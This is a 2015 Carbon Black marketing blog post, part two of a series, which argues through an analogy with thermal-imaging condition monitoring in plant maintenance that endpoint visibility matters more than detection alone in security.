Carbon Black & VMware Announce Expanded Partnership to Secure the Software-Defined Data Center (SDDC) Learn more

A Condition Monitoring Approach to Cyber Security, Part 2 – Visibility is Key

Hex_Honeycomb
Hex_Dots_40pct
April 13, 2015 / Dave Brown
thermal1
Figure 1: Hotspot indicating a fault at an electrical substation

To a plant maintenance engineer, the chance that a project might “blow up” is more than just a figure of speech—it’s a real-life risk. So we can be sure that these maintenance managers take their jobs very seriously. In this blog series we will explore some of the lessons we can learn from the approach plant maintenance engineers take in doing their jobs.

Lesson 2: Seeing is believing: The Importance of visibility

In part one of this blog series, we discussed how, in the world of plant maintenance, the notion of routine maintenance was supplanted by condition monitoring and how that paralleled the effectiveness of a detection/response approach to security (versus relying on a traditional antivirus tool for protection). In this blog, we will explore what the field of condition monitoring has to teach us about why visibility should take priority over detection.

There are many ways to detect a fault on a typical manufacturing plant floor. Low-tech methods might be as mundane as visual inspection for leaky pipe joints, “sniff tests” for burning insulation, or touching a motor casing to see if it’s running hot.

Advancements in technology led to both the need for – and availability of – more precise means of detecting faults – technologies such as vibration analysis, ultrasound, oil analysis, etc. But even these technologies had their limitations, either in scope or in practicality. Many of them required machinery (or circuits) to be shut down or even disassembled in order to be tested. Certain testing methods actually required the destruction of a sample. These limitations rendered many of the early testing techniques either too costly, too time-consuming, or otherwise too impractical for most plants to implement.

New kids on the block – Thermal Imagers

For many plants, low-tech testing methods changed when companies such as FLIR began offering portable infrared thermal-imaging cameras. A manufacturer could then equip its maintenance staff with a device that would enable them to safely see the faults with their own eyes and without having to take their equipment offline.

How it works – Everything Glows

Although our eyes are limited to seeing the glow of objects that are hot enough to glow in the visible portion of the electromagnetic spectrum (such as red-hot iron), cooler objects also “glow” but in the infrared spectrum, invisible to the naked eye. Infrared thermal imagers convert that infrared “glow” to the visible range, with different colors representing different temperature ranges.

The advantages of thermal imaging over older methods are both wide-ranging and compelling:

1) Reduced response time

2) Better access

3) More detail

4) Facilitated root-cause analysis

thermal2
Figure 2 Thermal Imaging dramatically reduces the time it takes to find exactly which circuit in a breaker panel has a faulty connection.

Thermal imaging provides visibility where there was none before. While other forms of testing might alert us to the existence of a problem (detection), thermal imaging also can inform us of its source and nature.

What does that have to do with information security?

In information security, visibility is key. Detection tools have their place, but the value of simply knowing that a problem exists is of limited value. In order to most effectively respond to a breach, we must fully understand an attack’s source and scope. Only by having visibility into everything that is running in the environment can we gain this understanding.

thermal3

The screenshot above from Carbon Black shows the process tree leading up to the current instantiation of powershell.exe, in addition to its user, host and command line. Carbon Black also displays publisher information, correlated third-party threat intelligence, and a list of significant metadata events, such as file modifications, registry modifications, network connections, and child processes. Having this visibility in your environment provides similar benefits to using thermal imaging on a factory floor, including:

  1. Quicker investigations: Visibility can fill in the gaps between detection events, enabling you to complete, in minutes, an investigation that would take a traditional forensics approach hours or even days to complete, if at all.
  2. Better access: With the centralized console that a visibility product provides, it is no longer necessary to have direct access to a compromised machine. No more shipping (or travelling) expenses associated with an investigation.
  3. Greater level of detail: Having access to the relationships between all of the metadata and events associated with every executed process provides a much higher level of confidence in an investigation’s findings.
  4. Root cause: A recorded history of every process that has ever run will enable you to “rewind the tape,” making it possible for you to respond to the true root cause, rather than just detected events.

Additional Benefits

Once the benefit of thermal imaging had been proven in the condition-monitoring space, many other new applications began to emerge, such as medical, building, R&D, etc. Likewise, employing a tool that provides visibility across all of the computers in your enterprise can deliver additional benefits beyond detection and response. These might include vulnerability/risk assessment, software license management, file integrity monitoring/control, etc.

Whether looking for hotspots around a manufacturing plant floor or malicious activity in your computer environment, visibility is key.

In our next post, we will explore how condition monitoring can help enhance our risk assessment strategy.

TAGS:

Related Posts